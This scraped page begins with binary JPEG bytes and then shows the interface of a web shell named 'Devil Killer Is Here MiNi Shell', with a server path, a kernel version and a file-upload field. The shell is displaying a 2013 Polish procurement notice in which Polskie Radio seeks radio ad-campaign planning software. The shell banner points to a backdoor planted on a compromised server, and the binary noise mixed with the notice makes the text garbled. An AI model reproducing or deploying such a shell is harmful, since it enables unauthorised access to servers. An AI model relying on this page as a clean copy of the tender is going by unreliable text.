JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130409/53243-N-2013.html

<p class="kh_header"><b>Warszawa: Dostarczenie oprogramowania do analizy i planowania kampanii reklamwych w radiu (znak sprawy: BZ/SZP-35/13)</b><br>
<b>Numer ogłoszenia: 53243 - 2013; data zamieszczenia: 09.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polskie Radio S.A. Sekcja Zamówień Publicznych , Al. Niepodległości 77/85, 00-977 Warszawa, woj. mazowieckie, tel. +48 22 6459384, faks +48 22 6453957.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostarczenie oprogramowania do analizy i planowania kampanii reklamwych w radiu (znak sprawy: BZ/SZP-35/13).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z wdrożeniem oraz licencjami oprogramowania do analizy i planowania kampanii reklamowych w radiu. Szczegółowy opis przedmiotu, w tym szczegółowe wymogi i warunki jego realizacji, zawarte zostały w Załączniku nr 1 do SIWZ (Opis przedmiotu zamówienia) oraz w Załączniku nr 8 do SIWZ (Wzór umowy)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.48.10.00-3, 72.61.10.00-6, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości  15.000,00 zł (słownie: piętnaście tysięcy złotych).
15.2.Wadium wpłaca / wnosi się przed upływem terminu składania ofert w następujących formach (w zależności od wyboru wykonawcy):
15.2.1. pieniądzu, wpłaconym na konto Zamawiającego: Bank PEKAO S.A. w Warszawie, numer rachunku: 47 1240 5918 1111 0010 3740 7871; natomiast dla wpłat międzynarodowych PL 47 1240 5918 1111 0010 3740 7871, SWIFT PKOPPLPW;
15.2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
15.2.3. gwarancjach bankowych;
15.2.4. gwarancjach ubezpieczeniowych;
15.2.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz.U. z 2007 r., Nr 42, poz. 275 ze zm.).
15.3. W przypadku wniesienia wadium w  formie pieniądza złożenie dyspozycji przelewu określonej kwoty pieniężnej nie jest wystarczające do uznania wniesienia wadium, jego skuteczność następuje dopiero w przypadku uznania rachunku bankowego Zamawiającego należną kwotą wadium.
15.4. W przypadku wniesienia wadium w formie gwarancji bankowej bądź ubezpieczeniowej, koniecznym jest, aby gwarancja obejmowała odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę, określone w art. 46 ust. 4a i ust. 5 ustawy. Koniecznym jest również, aby gwarancja obejmowała cały okres związania ofertą określony w SIWZ.
15.5. W przypadku wniesienia wadium w formie innej niż w pkt. 15.2.1. SIWZ, konieczne jest zdeponowanie oryginału dowodu wniesienia wadium w kasie Polskiego Radia S.A., nowy budynek, parter, kasa czynna jest w dni robocze (pn. - pt.) w godzinach 11:00-13:00, tel. +48 (22) 645-92-22.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymogów niezbędnych do wykazania spełnienia przedmiotowego warunku. Wykonawcy zobowiązani są przedłożyć oświadczenie, o którym mowa w pkt. III.4.1) niniejszego ogłoszenia (pkt. 10.1.1. SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek posiadania wiedzy i doświadczenia, Zamawiający uzna wykonawców, którzy wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jedno zamówienie polegające na dostawie, wdrożeniu i serwisie oprogramowania do analizy i planowania kampanii reklamowych w
ogólnokrajowej stacji radiowej, o minimalnej wartości 100.000,00 zł brutto. Ocena spełnienia warunku udziału zostanie dokonana na podstawie oświadczenia oraz dokumentów, o których mowa wymienionych w pkt. III.4.1) niniejszego ogłoszenia (wymienionych w pkt. 10.1. SIWZ), w oparciu o kryterium spełnia / nie spełnia. Wykonawcy, którzy wykazując, na zasadach określonych w art. 26 ust. 2b) ustawy, spełnienie niniejszego warunku udziału, polegać będą na zasobach innych podmiotów, zobowiązani są udowodnić Zamawiającemu, że będą dysponowali zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów, o którym mowa poniżej w pkt. III.6. niniejszego ogłoszenia (wymienionego w pkt. 10.1.4. SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymogów niezbędnych do wykazania spełnienia przedmiotowego warunku. Wykonawcy zobowiązani są przedłożyć oświadczenie, o którym mowa w pkt. III.4.1) niniejszego ogłoszenia (pkt. 10.1.1. SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymogów niezbędnych do wykazania spełnienia przedmiotowego warunku. Wykonawcy zobowiązani są przedłożyć oświadczenie, o którym mowa w pkt. III.4.1) niniejszego ogłoszenia (pkt. 10.1.1. SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymogów niezbędnych do wykazania spełnienia przedmiotowego warunku. Wykonawcy zobowiązani są przedłożyć oświadczenie, o którym mowa w pkt. III.4.1) niniejszego ogłoszenia (pkt. 10.1.1. SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">10.5. W celu potwierdzenia, że oferowana dostawa odpowiada wymogom określonym przez Zamawiającego w Załączniku nr 1 do SIWZ (Opis przedmiotu zamówienia), wykonawcy zobowiązani są przedłożyć:
10.5.1. specyfikację funkcjonalną oferowanego oprogramowania wg wzoru na Załączniku nr 7 do SIWZ;
10.5.2. specyfikację techniczną producenta lub inny dokument producenta (w oryginale lub kopii poświadczonej przez wykonawcę lub upełnomocnionego przedstawiciela wykonawcy - w formie drukowanej), zawierające w szczególności: opis wartości parametrów, funkcji i konfiguracji.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy, którzy wykazując, na zasadach określonych w art. 26 ust. 2b) ustawy, spełnienie warunku udziału, opisanego w pkt. 8.2. SIWZ, polegać będą na zasobach innych podmiotów, zobowiązani są udowodnić Zamawiającemu, że będą dysponowali zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów z którego wynikać będzie faktyczna dostępność zasobów podmiotów trzecich w okresie realizacji zamówienia, tj. rzeczywista możliwość dysponowania przez wykonawcę zasobami podmiotu trzeciego przy wykonaniu przedmiotowego zamówienia.  Dla skutecznego złożenia, w myśl art. 26 ust. 2b) ustawy,  zobowiązania podmiotu trzeciego, jego treść winna zawierać: oznaczenie podmiotu udostępniającego zasoby (potencjał), oznaczenie podmiotu przejmującego zasoby, zakres zobowiązania podmiotu trzeciego (opis - konkretyzacja  udostępnianych zasobów), sposób wykonania zobowiązania (w jaki sposób zobowiązanie będzie wykonywane - w przypadku gdy zasoby są nierozerwalnie związane z podmiotem je udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia - również wyraźne nawiązanie do uczestnictwa podmiotu w wykonaniu zamówienia), wskazanie czasu, na jaki zasoby zostaną udostępnione.
10.6. Pozostałe dokumenty:
10.6.1. wypełniony Formularz oferty wg wzoru na Załączniku nr 5 do SIWZ;
10.6.2. dowód wniesienia wadium;
10.6.3. pełnomocnictwo - złożone w oryginale lub uwierzytelnionym notarialnie odpisie - w przypadku, gdy ofertę w imieniu wykonawcy składa pełnomocnik. Pełnomocnictwo powinno określać zakres umocowania i być podpisane przez osoby uprawnione do reprezentacji wykonawcy.
DOKUMENTY POTWIERDZAJĄCE BRAK PODSTAW DO WYKLUCZENIA WYMAGANE OD OSÓB FIZYCZNYCH ORAZ WYKONAWCÓW MAJĄCYCH SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA POZA TERYTORIUM RP: 10.2.1.oświadczenie o braku podstaw do wykluczenia wg wzoru na Załączniku nr 3 do SIWZ; 10.2.3. wykonawcy będący osobami fizycznymi, zobowiązani są przedłożyć tylko oświadczenie o braku podstaw do wykluczenia, o którym mowa wyżej w pkt. 10.2.1. SIWZ. Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej w przypadku, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę nie wydaje się dokumentu lub dokumentów o którym mowa w pkt III.4.3.1 niniejszego ogłoszenia, wykonawca zastępuje go (je) dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokument lub dokumenty, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. DOKUMENTY I OŚWIADCZENIA WYMAGANE OD
WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA W przypadku składania oferty wspólnej, wykonawcy zobowiązani są do ustanowienia 
i wskazania pełnomocnika, stosownie do postanowień art. 23 ust. 2 ustawy oraz do przedłożenia pełnomocnictwa w oryginale lub uwierzytelnionym notarialnie odpisie, uprawniającego pełnomocnika do reprezentacji w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia i określającego zakres umocowania pełnomocnika, a ponadto: 10.7.1. w celu wykazania spełnienia warunków udziału, określonych w pkt. 8.1. SIWZ, do przedłożenia oświadczenia o którym mowa w pkt. 10.1.1. SIWZ oraz dokumentów, o których mowa w pkt. 10.1.2. SIWZ - 10.1.3. SIWZ; 10.7.2. w przypadku, gdy wykonawcy wspólnie ubiegający się o udzielenie przedmiotowego zamówienia, wykazując spełnienie warunku udziału, określonego w pkt. 8.1.2. SIWZ, polegać będą na zasobach innych podmiotów, do przedłożenia w szczególności dokumentów, o których mowa w pkt. 10.1.4 SIWZ; 10.7.3. w celu wykazania braku podstaw do wykluczenia, do przedłożenia, przez każdego z wykonawców wspólnie ubiegających się o udzielenie przedmiotowego zamówienia, oświadczenia, o którym mowa w pkt. 10.2.1. SIWZ oraz dokumentu, o którym mowa w pkt. 10.2.2. i 10.3 SIWZ, Postanowienie pkt. 10.4. SIWZ ma zastosowanie; 10.7.4.wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do przedłożenia dokumentów wymienionych w pkt. 10.5.1. SIWZ i 10.5.2. SIWZ oraz wymienionych w pkt. 10.6.1. SIWZ i 10.6.2. SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - jakość oferty - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień niniejszej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności.
2. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
3. W przypadku zmiany stawki podatku VAT w okresie obowiązywania umowy, nowa stawka podatku VAT obowiązuje od dnia wejścia w życie aktu prawnego wprowadzającego jej zmianę, a Zamawiający zobowiązany jest do zapłaty wynagrodzenia w wysokości wskazanej w fakturze według stawki obowiązującej w chwili jej wystawienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.prsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polskie Radio S.A. al. Niepodległości 77/85, 00-977 Warszawa budynek O-1 (stary budynek) III piętro, pok. 351.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 14:45, miejsce: Ofertę należy złożyć w siedzibie Polskiego Radia S.A. mieszczącej się przy ul. Myśliwieckiej 3/5/7 w Warszawie, do skrzynki oznaczonej Oferty na dostarczenie oprogramowania do analizy... etc..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> ZABEZPIECZENIE NALEŻYTEGO WYKONANIA UMOWY
20.1.Wykonawca przed podpisaniem Umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 5 % ceny całkowitej podanej w ofercie, 
w jednej lub kilku następujących formach w zależności od wyboru wykonawcy:
20.1.1.pieniądzu, wpłaconym na konto Zamawiającego: Bank PEKAO S.A. w Warszawie, numer rachunku: 47 1240 5918 1111 0010 3740 7871, natomiast dla wpłat międzynarodowych PL 47 1240 5918 1111 0010 3740 7871, SWIFT PKOPPLPW
20.1.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
20.1.3.gwarancjach bankowych;
20.1.4.gwarancjach ubezpieczeniowych;
20.1.5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości tekst jedn.: Dz.U. 2007 r., Nr 42, poz. 275 ze zm..
20.2. W przypadku wnoszenia zabezpieczenia należytego wykonania Umowy w formie gwarancji bankowej lub ubezpieczeniowej, gwarancja ta powinna być nieodwołalna, bezwarunkowa, nie podlegająca przenoszeniu i płatna na pierwsze żądanie Zamawiającego. Zobowiązanie wynikające dla banku/ubezpieczyciela udzielającego takiej gwarancji pozostaje dla niego wiążące przez okres wykonywania Umowy, przedłużony o okres 30 dni.
20.3.W przypadku wnoszenia zabezpieczenia należytego wykonania Umowy w formie gwarancji bankowej lub ubezpieczeniowej albo w formie poręczenia bankowego, warunki gwarancji lub poręczenia muszą być zaakceptowane przez Zamawiającego.
21 INFORMACJE O CZYNNOŚCIACH PODEJMOWANYCH PO WYBORZE OFERTY 
W CELU ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO
21.1. Po zakończeniu postępowania, a przed zawarciem umowy wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany będzie do przedłożenia dokumentu potwierdzającego wniesienie zabezpieczenia należytego wykonania umowy.
21.2. Ponadto, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za najkorzystniejszą, przedłożą umowę regulującą współpracę tych wykonawców.
CENA I WARUNKI PŁATNOŚCI
1. Strony, zgodnie z ofertą Wykonawcy ustalają, że za realizację przedmiotu Umowy, określonego w § 1 ust.1, Zamawiający zapłaci Wykonawcy wynagrodzenie w wysokości zgodnie z Załącznikiem nr 4 do Umowy FORMULARZ OFERTY. Wynagrodzenie, o którym wyżej mowa składa się z:
a) Opłaty licencyjnej za Oprogramowanie 
I rata w terminie 14 dni od daty otrzymania faktury VAT, wystawionej po podpisaniu Protokołu Odbioru Funkcjonalnego Oprogramowania,
II rata w terminie 14 dni od daty otrzymania faktury VAT, po okresie 12 miesięcy od dnia podpisania Protokołu Odbioru Funkcjonalnego Oprogramowania;
III rata w terminie 14 dni od daty otrzymania faktury VAT, po okresie 24 miesięcy od dnia podpisania Protokołu Odbioru funkcjonalnego Oprogramowania, 
IV rata w terminie 14 dni od daty otrzymania faktury VAT, po okresie 36 miesięcy od dnia podpisania Protokołu Odbioru Funkcjonalnego Oprogramowania;
b) Opłaty licencyjnej za oprogramowanie bazy danych 
c) Opłaty instalacyjnej;
d) Wynagrodzenia za Serwis Wsparcia:
I rata w terminie 14 dni od daty otrzymania faktury VAT, wystawionej po podpisaniu Protokołu Odbioru Funkcjonalnego Oprogramowania;
II rata w terminie 14 dni od daty otrzymania faktury VAT, po okresie 12 miesięcy od dnia podpisania Protokołu Odbioru Funkcjonalnego Oprogramowania;
III rata w terminie 14 dni od daty otrzymania faktury VAT, po okresie 24 miesięcy od dnia podpisania Protokołu Odbioru funkcjonalnego Oprogramowania;
IV rata w terminie 14 dni od daty otrzymania faktury VAT, po okresie 36 miesięcy od dnia podpisania Protokołu Odbioru Funkcjonalnego Oprogramowania;
e) Wynagrodzenia za Usługi Dodatkowe, obejmujących: instalacje nowych wersji Oprogramowania, wprowadzanie wszelkich ulepszeń Oprogramowania, usunięcie anomalii związanych z działaniem Oprogramowania;
f)Opłaty za dostosowanie formatu danych wygenerowanych z Oprogramowania do Raportu Wynikowego.
2. W wynagrodzeniu określonym w ust. 1 mieszczą się także wszystkie kwoty związane z realizacją przedmiotu Umowy wymienione w § 1 ust.1, w tym koszty związane z cłem, opłatami i podatkami.
3. Wynagrodzenia z tytułu opłat licencyjnych, opłaty instalacyjnej, wynagrodzenia za Serwis Wsparcia, wynagrodzenia za Usługi Dodatkowe i opłaty za dostosowanie formatu danych wygenerowanych z Oprogramowania do Raportu Wynikowego są wyszczególnione powyżej w ust. 1.
